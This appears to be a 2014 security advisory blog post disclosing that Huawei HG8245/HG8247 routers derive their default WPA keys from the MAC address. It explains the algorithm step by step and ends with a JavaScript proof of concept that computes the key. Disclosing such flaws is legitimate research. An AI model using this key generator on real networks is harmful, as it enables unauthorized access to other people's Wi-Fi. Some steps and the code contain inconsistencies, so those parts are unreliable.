Huawei HG8245 / HG8247 WPA Generator

Huawei HG8245 / HG8247 WPA Generator

Posted on May 22 2014   |  Plain text version

Summary

Huawei HG8245 & HG8247 ONT (firmware version V1R006C00S100) rely on a weak algorithm to calculate the WPA keys, keys can be predicted easily using the WiFi's MAC Address (BSSID).

Description

Modelo: Huawei HG8245 & HG
Versión de hardware: 130C4600
Versión de software: V1R006C00S100




The WPA Key is a 8 char string that is calculated through the following method:

1. First we obtain the MAC Address from the SSID or Access point (BSSID)

Example:

MAC = 00:46:4B:D3:CE:5F

A) In order to calculate the first two characters from the WPA key, we use the following formula:

We take the value from the fourth pair of the MAC Address:

Example: D3
WPA Key so far: D3

B) In order to calculate the next two characters from the WPA Key, we use the following formula:

We take the last two characters from the MAC Addres, if both are less than 08 (in hexadecimal):
- We take the fifth pari of chars from the MAC address and we substract 1 (in hex).
- If is not equal than 08, value remains the same:

Example:
CE is less than 08?
No, so the value is the same, CE. (If base was less than 08h, value had been CE - 1h = CD.

WPA Key so far: D3CE
Note: If base is 0, 0 less 1 will be equal to F.

C) In order to calculate the next value from the WPA Key, we use the following formula:

We take the second char from the last pair of the MAC Address, if is less than 08h:

- We take the first char of the last pair of the MAC Address and we substract 1h.
- If is not less than 08h, value remains the same:

Example:
F is less than 08h?
No, so, the value will be the first character from the last pair of the MAC Address, in this case will be 5.

WPA Key so far: D3CE5
Note: If base is 0, 0 less 1 will be equal to F.

D) In order to calculate the next value from the WPA Key, we use the following formula:

Take the second char from the last pair of digits from the MAC Address and switch as follows:

When value is 8 switch to F.
When value is 9 switch to 0.
When value is A switch to 1.
When value is B switch to 2.
When value is C switch to 3.
When value is D switch to 4.
When value is E switch to 5.
When value is F switch to 6.
When value is 0 switch to 7.
When value is 1 switch to 8.
When value is 2 switch to 9.
When value is 3 switch to A.
When value is 4 switch to B.
When value is 5 switch to C.
When value is 6 switch to D.
When value is 7 switch to E.

Example:
If second digit from the last pair of chars from the MAC Address is F, the WPA value will be 6.

WPA Key so far is: D3CE56


E) In order to calculate the next two values from the WPA Key, we use the following formula:

We take the frist pair of chars from the MAC Address and we make the following switch:

When value is 28 switch to 03.

When value is 28 switch to 03.
When value is 08 switch to 05.
When value is 80 switch to 06.
When value is E0 switch to 0C.
When value is 00 switch to 0D.
When value is 10 switch to 0E.
When value is CC switch to 12.
When value is D4 switch to 35.
When value is AC switch to 1A.
When value is 20 switch to 1F.
When value is 70 switch to 20.
When value is F8 switch to 21.
When value is 48 switch to 24.

Example:
If first pair of chars from the MAC Address is 00, last two values from the WPA Key will be 0D.
Final WPA Key is: D3CE560D

Second pratical example:

MAC:
E0:24:7F:E5:80:01

A) Fourth MAC pair of chars is: E5
B) Last pair of chars from the MAC less than 08, so:
01 is less than 08? Yes, so, 80 - 1 = 7F
WPA Key so far is: E57F
C) Second char from the last pair of chars in the MAC: 1
1 is less than? Yes, so 0 - 1 = F.
WPA Key so far is: E57FF
D) Second char from the last pair of chars in the MAC: 1
When value is 1 switch to 8.
WPA Key so far is: E57FF8
E) First pair of chars from the MAC: E0
When value is E0 switch to 0C.
Final WPA is: E57FF80C

Author: Kaczinski @ [email protected]

POC

function HG824x()
{
//HUAWEI HG8245/HG8247 MAC Address to WPA Key (ROUTERPWN.COM version)
MACs = prompt("MAC:");
MAC = MACs.split(":");
last=MAC[0];part1=MAC[3];part2=MAC[4];partx=MAC[5];extract=MAC[5].split("");part3=extract[0];offset=extract[1];integer=parseInt(offset,16);value=parseInt(part3,16);
if ( integer >= 0 && integer <= 8 ){
if ( value == 0 ){
val = "F"; 
}else{
value = value - 1; 
}

val = value.toString(16).toUpperCase();
switch (offset) { 
case "8": part3="F"; break; case "9": part3="0"; break; case "A": part3="1"; break; case "B": part3="2"; break;
case "C": part3="3"; break; case "D": part3="4"; break; case "E": part3="5"; break; case "F": part3="6"; break;
case "0": part3="7"; break; case "1": part3="8"; break; case "2": part3="9"; break; case "3": part3="A"; break;
case "4": part3="B"; break; case "5": part3="C"; break; case "6": part3="D"; break; case "7": part3="E"; break; }
switch (last) {
case "28": part4="03"; break; case "08": part4="05"; break; case "80": part4="06"; break; case "E0": part4="0C"; break;
case "00": part4="0D"; break; case "10": part4="0E"; break; case "CC": part4="12"; break; case "D4": part4="35"; break;
case "AC": part4="1A"; break; case "20": part4="1F"; break; case "70": part4="20"; break; case "F8": part4="21"; break; 
case "48": part4="24"; break; default: alert("This MAC might is not elegible for getting WPA key"); return;}
integer=parseInt(partx,16); 
if ( integer >= 0 && integer <= 8 ){
new_v=parseInt(part2,16);
new_value=new_v-1;
part2=new_value.toString(16).toUpperCase()
if ( val == 0 ){
val = "F"; 
}
}
alert("WPA Key: "+part1+part2+val+part3+part4);
}


Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.